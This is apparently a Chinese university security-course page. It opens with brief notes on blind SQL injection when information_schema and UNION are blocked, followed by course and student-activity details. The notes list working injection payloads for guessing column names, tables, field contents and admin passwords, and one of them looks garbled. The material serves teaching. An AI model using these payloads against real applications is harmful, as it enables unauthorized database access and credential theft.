无权读取information_schema库和拒绝union order by语句
执行权限低
猜列名 1' and user is not null-- 如果为假 就不返回东西 为真1的返回
猜当前表名 1'and table.user in null-- 一样的
猜其它的表 1'and (select count(*) from table)>0--
猜字段内容 1'and user='admin
匹配含有a的字段内容 1' or user like '%a%
猜密码 1'or user='admin'and password='ddd131545asd54da1d231d5ad5a2as85
6人加入学习
(0人评价)
该课程属于 南华大学信息安全专业 请加入后再学习
授课教师
安全经理
课程特色
视频(99)
下载资料(1)
最新学员
学员动态
南华_希望
开始学习 w3af身份认证-HTTP h...
南华_希望
开始学习 w3af身份认证-Form和C...
南华_希望
开始学习 w3af身份认证-HTTP B...
南华_希望
开始学习 漏洞挖掘原则、命令执行